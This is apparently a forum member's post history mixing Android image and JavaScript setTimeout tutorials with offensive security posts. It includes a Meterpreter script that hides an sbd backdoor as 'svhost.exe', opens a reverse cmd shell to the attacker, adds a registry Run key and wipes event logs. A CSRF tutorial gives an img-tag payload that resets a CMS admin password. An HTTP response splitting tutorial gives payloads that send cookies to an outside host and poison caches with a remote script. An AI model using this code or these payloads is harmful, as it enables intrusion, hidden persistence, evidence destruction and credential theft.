Gonzalez
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
BitmapDrawables are simply Drawable objects that wrap a bitmap and can be created from file path, input stream, XML inflation from a layout, and bitmaps.
Building Bitmap Objects
File
Use the adb tool with push option to copy test2.png onto the sdcard.
bash-3.1$ /usr/local/android-sdk-linux/tools/adb push test2.png /sdcard/
This is the easiest way to load bitmaps from the sdcard. Simply pass the path to the image to BitmapFactory.decodeFile() and let the Android SDK do the rest.
package higherpass.TestImages;
import android.app.Activity;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.os.Bundle;
import android.widget.ImageView;
public class TestImages extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
Bitmap bMap = BitmapFactory.decodeFile("/sdcard/test2.png");
image.setImageBitmap(bMap);
}
}All this code does is load the image test2.png that we previously copied to the sdcard. The BitmapFactory creates a bitmap object with this image and we use the ImageView.setImageBitmap() method to update the ImageView component.
Input stream
Use BitmapFactory.decodeStream() to convert a BufferedInputStream into a bitmap object.
package higherpass.TestImages;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import android.app.Activity;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.os.Bundle;
import android.util.Log;
import android.widget.ImageView;
public class TestImages extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
FileInputStream in;
BufferedInputStream buf;
try {
in = new FileInputStream("/sdcard/test2.png");
buf = new BufferedInputStream(in);
Bitmap bMap = BitmapFactory.decodeStream(buf);
image.setImageBitmap(bMap);
if (in != null) {
in.close();
}
if (buf != null) {
buf.close();
}
} catch (Exception e) {
Log.e("Error reading file", e.toString());
}
}
}This code uses the basic Java FileInputStream and BufferedInputStream to create the input stream for BitmapFactory.decodeStream(). The file access code should be surrounded by a try/catch block to catch any exceptions thrown by FileInputStream or BufferedInputStream. Also when you're finished with the stream handles they should be closed.
XML inflation
Bitmaps can be extracted from layouts and views with inflation. Use BitmapFactory.decodeResource(res, id) to get a bitmap from an Android resource.
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
Bitmap bMap = BitmapFactory.decodeResource(getResources(), R.drawable.icon);
image.setImageBitmap(bMap);
}First create an ImageView instance containing the ImageView from the layout. Then create a bitmap from the application icon (R.drawable.icon) with BitmapFactory.decodeResource(). Finally set the new bitmap to be the image displayed in the ImageView component of the layout.
Bitmaps
The BitmapFactory.decodeByteArray() method of creating bitmaps creates a bitmap from an array of bytes. This is useful when a bitmap has been loaded for another purpose or has been created by the application or other external source.
package higherpass.TestImages;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import android.app.Activity;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.os.Bundle;
import android.util.Log;
import android.widget.ImageView;
public class TestImages extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
FileInputStream in;
BufferedInputStream buf;
try {
in = new FileInputStream("/sdcard/test2.png");
buf = new BufferedInputStream(in);
byte[] bMapArray= new byte[buf.available()];
buf.read(bMapArray);
Bitmap bMap = BitmapFactory.decodeByteArray(bMapArray, 0, bMapArray.length);
image.setImageBitmap(bMap);
if (in != null) {
in.close();
}
if (buf != null) {
buf.close();
}
} catch (Exception e) {
Log.e("Error reading file", e.toString());
}
}
}As with the decodeStream() example we open the file in an input stream. This time though we go the extra mile and manually read the file into a byte array. This isn't the best way to do this if you haven't noticed, but it's a simple way to show the functionality. Use the BitmapFactory.decodeByteArray() method to create the bitmap. This function expects 3 parameters, the byte array, the array offset to start from, and the array offset to stop at.
-
Basic Android Image Information
Android supports 3 common image formats PNG, JPG, GIF, along with 9 patch PNG images. Images are stored in the directory res/layout/drawable. As of version 1.6 of the Android SDK multiple drawable directories exist for different screen resolutions. There are low, medium, and high DPI specific directories, drawable-ldpi, drawable-mdpi, drawable-hdpi respectively. This allows you to create images at different DPI to enhance the appearance of your application. All image filenames should be lowercase and only contain letters, numbers, and underscores.
Create a new project in Eclipse called TestImages.
Displaying An Image
The ImageView layout component is the base element used for displaying images in Android. Download this image and copy it into res/layout/drawable-mdpi in your project. We're simply going to use a screenshot of the emulator.
<ImageView
android:id="@+id/test_image"
android:src="@drawable/test"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
/>This ImageView loads the image test that you downloaded. Add this to the res/layout/main.xml file below the TextView.
package higherpass.TestImages;
import android.app.Activity;
public class TestImages extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
}
}All that was added to the default code is how to get the ImageView component from the layout and store it in a variable. We'll do more with this in the next examples.
Changing The Image
Changing the image done by creating an ImageView object for the image component to change and calling the setImageResource() method. Instead of using resources a custom bitmap can also be used by invoking setImageBitmap(). We'll get to bitmaps next. Download this second image and store it as test2.png in res/layout/drawable-mdpi.
package higherpass.TestImages;
import android.app.Activity;
import android.os.Bundle;
import android.widget.ImageView;
public class TestImages extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
ImageView image = (ImageView) findViewById(R.id.test_image);
image.setImageResource(R.drawable.test2);
}
}Here simply store the ImageView into the image variable and use the setImageResource() method to point the ImageView at the second image.
-
In Javascript, setTimeout() is a method of window object for timing event. It is used to trigger a function or an expression after a specified number of milliseconds. It returns a numeric timeout ID that can be canceled with the clearTimeout() method.
Syntax
var t = setTimeout("javascript expression", milliseconds);
clearTimeout(t); //cancel the setTimeout() ID tTypical Use
Set a number of time of delay on Javascript expression.
var t = setTimeout("alert('Hello!')", 1000);Set a number of time of delay on Javascript function. The setTimeout function is usually at the end of the statements within the function.
var t;
function movee() {
var elem = document.getElementById("box");
var spot = parseInt(elem.style.top);
if (spot < 580) {
spot+=16;
elem.style.top=spot+"px";
}
t = setTimeout(movee,100);
}
document.getElementById('box').style.top='180px' //Reset
clearTimeout(t); //clear the setTimeout IDWhen the movee() function is triggered, the event is keeping running until the setTimeout ID is cleared by clearTimeout() method even though you reset the div box to its start position. To clear the setTimeout ID outsite the function, make sure the setTimeout ID a global scope variable.
A Wrong Use
The example below gives a common wrong use of setTimeout() method. The varible is a local variable while the expression alert(str) is an expression in global scope. Hence, it cannot see the local variable str.
function foo() {
var str = "hello";
setTimeout("alert(str);", 1000);
}foo(); // returns str is undefined.
When setTimeout is used in the Javascript object, the meaning that the keyword this stands for will change in the method contaning setTimeout because the setTimeout() method will change the context to global scope. And this will stands for window object rather than object instance. So the example below uses a global property _this to keep it consistant.
function div(id) {
this.id = id;
this.t = 0;
}
div.prototype = {
_this : "",
init: function() {
_this = this;
},
move: function() {
var elem = document.getElementById(_this.id);
var spot = parseInt(elem.style.top);
if (spot < 1700) {
spot+=16;
elem.style.top=spot+"px";
}
_this.t = setTimeout(_this.move,100);
}
};
var m = new div("box1");
m.init();
m.move();Object Bind method
The use of _this makes it possible div object can be referred in setTimeout. A more generic way of keep this keyword consistant is using extended Bind method. To distingush the similar bind method used for Function object. Here I use capital for the initial letter B. Bind method uses apply method to return a method / function with its this keyword consistant to the object invoking it.
div.prototype = {
move: function() {
var closure = this.Bind(this.move);
var elem = document.getElementById(this.id);
var spot = parseInt(elem.style.top);
if (spot < 1600) {
spot+=16;
elem.style.top=spot+"px";
}
this.t = setTimeout(closure,100);
},
Bind: function( Method ){
var _this = this;
return(
function(){
return( Method.apply( _this, arguments ) );
}
);
}
} -
Mersi pentru tutorial/link.
-Gonzalez
-
Just got an email from Microsoft Technet (stupid win 7 beta) with some interesting info on a remote code execution that they are now patching, so people who don't pay attention to microsoft updates (Like I used to are still Vulnerable)
Cumulative Security Update for Internet Explorer (978207)
General Information
Executive Summary
This security update resolves seven privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The more severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for all supported releases of Internet Explorer: Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and Internet Explorer 8 (except Internet Explorer 6 for supported editions of Windows Server 2003). For Internet Explorer 6 for supported editions of Windows Server 2003 as listed, this update is rated Moderate. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, validates input parameters, and filters HTML attributes. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.
This security update also addresses the vulnerability first described in Microsoft Security Advisory 979352.
Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.
For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.
See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.
Known Issues. None
Source
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
Also be sure to check the link to see all of the copies of internet explorer that are vulnerable and if anyone has an exploit, feel free to share
-
sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attacker
it autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update time
session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
"-r" => [ true, "Resporn time limit." ],
"-p" => [ true, "Port Number to open." ],
"-k" => [ true, "Authentication name."],
"-h" => [ true, "Local ip address."]
)
def usage
print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
print_line("####################################################")
print(@@exec_opts.usage)
raise Rex::Script::Completed
end
#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
fileontrgt = "#{location}\\#{"svhost"}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("#{file} Uploaded!")
return fileontrgt
end
#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Local Ip Sbd Will Connect Back On: #{ip}")
print_status("Local Port Sbd Will Connect Back On: #{port}")
print_status("Pass Phrase: #{auth}")
print_status("Respawn Time: #{time}")
end
#Fuction to add registry for sbd
def regadd(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
print_status("Adding to Registry ...")
session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Successfully added to Registry ...")
end
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
begin
evtlogs.each do |evl|
log = session.sys.eventlog.open(evl)
log.clear
end
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
#Menu-Imput
time = nil
port = nil
ip = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
time = val
when "-p"
port = val
when "-h"
ip = val
when "-k"
auth = val
end
}
if port
upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
usage
endVideo:
http://www.youtube.com/watch?v=imFAm3AxOuc
-
BackTrack 4 Final was launched a few weeks back with a better compilation of security tools and bugfixes. For those who have never heard of BackTrack, you might want to start by reading up on the history and purpose of this Linux distro.
Here is a simple HOWTO guide which I compiled while installing BT4 into my VMWare Workstation.
PART 1 : Setting Up The VM
* VMWare Workstation > File > New > Virtual Machine.
* Select Typical (Recommended) configuration > Next.
* Select the iso file > Guest Operating System : Linux Operating System > Version : Other Linux 2.6.x kernel.
* Name the VM as BackTrack.
* Allocated 8GB of disk space > Set it as Store Virtual Disk as a single file > Click on Finish when you are ready.
PART 2 : The Installation
* Boot up the image.
* Select Start BackTrack FrameBuffer (1024 x 768).
* BT4 starts initializing files and configurations.
* At the root prompt, type in “startx” no quotes and press enter to access the desktop.
(You are currently in Live CD mode and the installation has yet to take place)
* Once you have the desktop, double click on install.sh and that will kick start the installation.
The installation begins by asking you for your regional settings. Select as appropriate and follow through the on screen instructions.
Once the installation completes, it will prompt for you for a restart. Just proceed! Backtrack should now be up and running. Have fun.
-
In sfarsit a iesit si Backtrack 4 final
Description: Image Download
Name:: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269
Download:
http://www.backtrack-linux.org/download.php?fname=bt4f
-
Asa nu faci niciodata bani pe net. Evident iti trebuie o idee buna. Toata lumea asta vrea sa faca bani. Programe gen: affiliate sunt cele mai bune.
-Gonzalez
-
Cred ca e cea mai buna varianta de a practica fara a cumpara un router.
Chetnet Unofficial Ntlworld Forums - powered by vBulletin
D-LINK SYSTEMS, INC | WIRELESS ROUTER | SETUP
::: DrayTek Corp - Your reliable networking solutions partner - Support - Live Web Demo :::
NETGEAR France - TELECHARGEMENTS : Liste Interfaces
-Gonzalez
-
Ive recently been doing some research into distributed computing, specifically distributed password cracking. NetCrack only cracks md5 and SHA-1 to date, but i think its a very promising project.
NetCrack is a cluster software developed to distribute an hashing algorithm's cracking process work using the brute force attack.
NetCrack works like a client/server application, where the server is unique for each cluster network and its job is to distribuites the cracking process work, coordinates the nodes and prevents connections and data integrity errors.
Using a TCP/IP based protocol to estabilish and manage the connection, NetCrack widens its domain to the entire web, avoiding complexity in terms of network implementation and cost, allowing any system to contribuite.
The protocol has been made simple and universal to facilitate future supports and to allow the coding of alternate client software using any programming language.Site:
http://www.salvatorefresta.net/?opt=tools
Download:
http://www.salvatorefresta.net/files/tools/NetCrack-1.0.tar.gz
-Gonzalez
-
Ai venit pe forum sa speri copilasi?
-Gonzalez
-
Author: Connection
What is CSRF?
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
CSRF (Cross-Site Request Forgery) is a vulnerability found in web applications which allow a remote attacker to create a special web page or email which, when viewed by an authenticated viewer on a remote site, will execute a particular script. The script executed could range from creating usernames with administrative access, changing the admins (or any other user's) password, creating content on the site, deleting content on the site, and any other action that a user with an authenticated session might be able to do.
How do I find CSRF Vulnerabilities?
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
This is an interactive tutorial on finding CSRF Vulnerabilities using a demo CMS from http://demo.opensourcecms.com. At the time of this writing the vulnerability exists on Dubsite CMS 1.0 but the vendor has been alerted to this and thus I cannot verify that at the time this is written the vulnerability will exist. The tools I use to find CSRF vulnerabilties are Firefox Web Browser, the Tamper Data Firefox Plug-in, and Notepad++ (or any other text-editor).
Step 1: visit
http://demo.opensourcecmd.com/dubsite/index.php/login
and login with the following credentials:
Username: admin
Password: demo123Step 2: Navigate to the user control panel of the admin page located at http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts
Step 3: We are now going to attempt to modify the administrator's password. Click on edit and fill in the data you want. Before you click submit, start tamper data to sniff the requests.
Now make a note of the parameters passed to the website. Mine look like this:
The stuff we interested in are the URL up top and all the POST parameters in the right window. Open up your favorite text-editor and copy down all these values.
Step 4: Here comes the fun part, we are going to create our evil URL. We have to combine our base url with our post parameters.
Our base URL is the URL we copied from tamper data. In this case our base URL is :
http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1
When we append POST parameters to a base URL we start with adding a ? to the base URL and then combine parameters by linking them with a &. An example is http://base.url/goes/here?first=parameter&second=parameter
A more specific example is for our Dubsite CMS base URL:
http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update
As you can see we send the data back to the server the same way our browser sent it. This example URL will edit the administrator account's password and change it to test123.
Step 5: Now we have a few methods of getting the authenticated administrator to execute this command. First of all we could make a website and set it like this:
<html>
<head>
</head>
<body>
<img src = "http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update" />
</body>
</html>When the web browser views the page it will send the link to the admin's site trying to get the information for the image which will in turn execute the change password feature.
Another way to get the admin to execute the command is to email the admin with the <img> tag trick in the body of the email. Opening the email will cause the server to try to grab the image and will execute the change password function.
Conclusion
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
CSRF vulnerabilities could cause a lot of harm to a system admin because the form does not have some sort of validation token in place to make sure the administrator is actually issuing the command. A technique that will stop many attackers is to add HTTP_REFERER checking to the page with the form. Coming from an email or other website, the request for the form will be either blanked out or wrong and thus tip off the admin to what is going on. Combined with session tokens for making sure each visit to the form is unique, this will stop attackers from attacking your site via CSRF techniques.
Bonus Points
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
The create user function is also vulnerable to CSRF attacks. For more practice try to exploit it and create your own administrator user.
-
Author: Raimond
HTTP Splitting Tutorial
Contents
1.0 What is HTTP Splitting
2.0 Attack Methodology
2.1 Vulnerable Scripts
2.2 Attack Payloads
3.0 Securing Code
4.0 End
1.0 What is HTTP Splitting
HTTP Splitting (or HTTP Response Splitting) is method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol.
HTTP Splitting occurs when a attacker inputs arbitrary headers to control the server response.
It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks.
2.0 Attack Methodology
To perform a HTTP splitting attack the CR (Command Return. Also represented by %0d and \r) and LF (Line Feed. Also represented by %0a and \n) characters must be used to forge the servers response by injecting headers. Here is an example of a normal request to a example login script:
Request:
POST /login.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.06
Accept: text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.site.com/login.php
Cookie: test_cookie=1234
Content-Type: text/html
Content-Length: 98
username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2FResponse:
HTTP/1.x 302 Found
Location: http://www.site.com/admin/
Date: Tue, 29 Dec 2009 16:12:01 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.6
Set-Cookie: test_cookie=1234; path=/
Last-Modified: Tue, 29 Dec 2009 16:12:01 GMT
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8Now, the part of the request we are interested in is the post content (It is URL encoded. You can decode it for better viewing at http://meyerweb.com/eric/tools/dencoder/):
username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2F
Notice the redirect parameter. This parameter is put into the server's response headers:
HTTP/1.x 302 Found
Location: http://www.site.com/admin/ <--- User InputWe can use the for our advantage by modifying the redirect parameter.
2.1 Vulnerable Scripts
As you already know any script that uses user input in the server's response headers is vulnerable. Many web services do this is the form of a redirect and in some cases, setting a cookie.
Below are two vulnerable code examples.
Setting Cookies in PHP:
<?php
$name = $_GET['name'];
$session = "sup3rs3cr3tsessiondata";
setcookie("session", $session);
setcookie("name", $name);
?>User's Request:
http://www.site.com/setcookie.php?name=Raimond
Server's Response:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: session=sup3rs3cr3tsessiondata; name=Raimond <--- User InputRedirecting in PHP:
<?php
header("Location: $_GET['page'];");
?>User's Request:
http://www.site.com/redirect.php?redirect=http://www.newsite.com
Server's Response:
HTTP/1.x 302 Found
Location: http://www.newsite.com/ <--- User InputWe will cover these attacking these scripts in the next section.
I encourage you to install a web server (I run apache) and run these scripts to get a better understanding of HTTP Splitting. Note that PHP 5.1.2+ has been secured against HTTP Response Splitting thanks to the PHP Hardening Project! (Asp and other server languages are still vulnerable)
2.2 Injecting Payloads
Ok. Lets move onto injecting our headers. To create a new response we can fully control we must end the genuine response by using Content-Length: 0. If you know anything about HTTP you know that Content-Length: 0 tells the browser that there is nothing left to read (No HTML to parse) from the servers response. We can inject our Content-Length by using one set of raw CRLF symbols. Here is an example.
Normal Request
http://www.site.com/redirect.php?page=Content-Length%3a%200
1njected!
http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200
(This is URL encoded. Use URL Decoder/Encoder to decode it.)
%0d%0aContent-Length%3a%200 is the same as \r\nContent-Length: 0.
The \r\n (or %0d%0a in URL encoding) are the CR and LF characters. Think of these characters as the "\n" character in c++ or the result of pressing enter on your keyboard while running a word processor. Here is an example of what happens in the HTTP response after submitting a normal request and a injected request.
Normal Response
HTTP/1.1 302 Found
Location: Content-Length: 0Injected!
HTTP/1.1 302 Found
Location:(our CRLF characters made a newline)
Content-Length: 0Now we can start a forged HTTP response!
http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type%3a%20text/html%0d%0aContent-Length%3a%2020%0d%0a%0d%0a%3Chtml%3EHacked%3C%2Fhtml%3E
(Again this is encoded. Decode it for better viewing.)
Response (\r\n represents where we injected the %0d%0a CRLF characters)
HTTP/1.1 302 Found
Location:\r\n
Content-Length: 0\r\n
\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Content-Length: 20\r\n
\r\n
<html>Hacked</html>OK! We can change the servers response! Whats so great about this? Well, with HTTP Response Splitting we can deliver many attack payloads which I will cover in the next section.
XSS And Other Client Side Attacks
Well this should be straight forward. Just replace "<html>Hacked</html>" in the previous example with your attack payload. Don't forget to change the Content-Length to the length of your payload.
Cookie Stealing Payload
http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%20120%0D%0A%0D%0A%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.cookiejar.com%2Fcookies.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E%0A
HTTP Response
HTTP/1.1 302 Found
Location:\r\n
Content-Length: 0\r\n
\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Content-Length: 120\r\n
\r\n
<script>document.location="http://www.cookiejar.com/cookies.php?cookie="+document.cookie;</script>If you don't understand this script you need to learn XSS. Of course other client side attacks such as phishing, forging pages, internal scanning/discovery, CSRF can be executed through HTTP Splitting.
Cache Poisoning
Before I explain cache poisoning I will explain how web cache's work. The web cache is a storage bank for web pages and pictures. By using a web cache the user doesn't have to reconnect to the server everytime it revisits a page. The user's browser can just grab the saved page from the local cache as long as the server doesn't report that there is a newer version of the page available (if the page has been modified the browser will grab the new version of the page). So here's the scenario: You login to your homepage and your browser caches it. The pages response headers look like so:
HTTP/1.x 302 Found
Location: http://www.site.com/user/home.htm
Last-Modified: Tue, 29 Dec 2009 16:00:00 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.6
Set-Cookie: test_cookie=1234; path=/
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Content-Length: 200
<html>[Content Here]</html>Note the Last-Modified header!
Then the next day you login and the response look like so:
HTTP/1.x 302 Found
Location: http://www.site.com/user/home.html
Last-Modified: Wed, 30 Dec 2009 12:00:00 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.6
Set-Cookie: test_cookie=1234; path=/
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Content-Length: 200
<html>[Content Here]</html>The Last-Modified header has been changed to a later date thus your browser updates it's cache with the new page. We can exploit this behavior by setting the Last-Modified date to a date in the far future (Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT). By doing so the browser will cache the page and not update it until the date on the Last-Modified header or until the cache is cleared! We can use HTTP Splitting to forge a page and control it everytime the user browses to it!
Cache Poisoning Request
http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Sun%2C%201%20Jan%202050%2012%3A00%3A00%20GMT%0D%0AContent-Length%3A%20100%0D%0A%0D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fevil.js%22%3E%3C%2Fscript%3E%0D%0A
Response (Don't forget \r\n stands for the CRLF or %0d%0a characters we injected)
HTTP/1.1 302 Found
Location:\r\n
Content-Length: 0\r\n
\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT\r\n
Content-Length: 100\r\n
\r\n
<script src="http://www.evilsite.com/evil.js"></script>Note the Last-Modified header. Since we set the last modified header to a future date (40 years from now) the browser will not update its cache until then or until cache is cleared! Everytime the victim visits the injected page our payload will execute. The payload in this example is a remote js. The remote js file can be coded to do anything the attackers wants. An ideal attack would be to launch a xss shell and perform further attacks from there.
Since we control data on the page we can forge data, phish credentials, and copy the html contents! Many more client-side attacks can be executed because of the control we have over the html.
This ends the Attack Payloads section. Remember to think outside the box when performing HTTP Splitting. Many things can be done with it!
3.0 Securing Code
Securing in PHP:
Upgrade to newest version Wink!
Securing in ASP:
Use EnableHeaderChecking Property to encode the CR and LF characters.
4.0 End
Well this is goodbye. I hope you enjoyed and understood the tutorial. Please give suggestions and comments for enhancing the quality of this tut. Thanks!
Resources:
http://h4k.in/encoding/
http://meyerweb.com/eric/tools/dencoder/
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol-
1
-
-
Freddie Gibbs - Just Tryin' Ta Make It.mp3
-Gonzalez
-
Tutoriale in engleza Tutoriale in limba engleza
Cadorui moka se dau la Off-Topic. Fara suparare.
-Gonzalez
-
Chucky.
-Gonzalez
-
Mersi pentru informatii v1c.
-Gonzalez
-
Sarbatori fericite la toti. Sa va aduca mosu sanatate si tot ce va doriti. Amin.
-Gonzalez
-
Par interesante, mersi.
-Gonzalez
-
pr0n sau forum pentru a ajuta oamenii cu probleme in securitate, bug-uri etc. eventual contra cost.
-Gonzalez
-
Oricum nu va fi ce a fost. Ma bucur pentru ei, bravo lor.
-Gonzalez
-
-Gonzalez
-
Din pacate nu am putut sa vad Cronica Carcotasilor, dar imi place ultima parte a emisiuni:
Cronica Carcotasilor - 2 decembrie 2009 (part.9)
-Gonzalez
setTimeout() in js Object
in Programare
Posted
Goooood!
-Gonzalez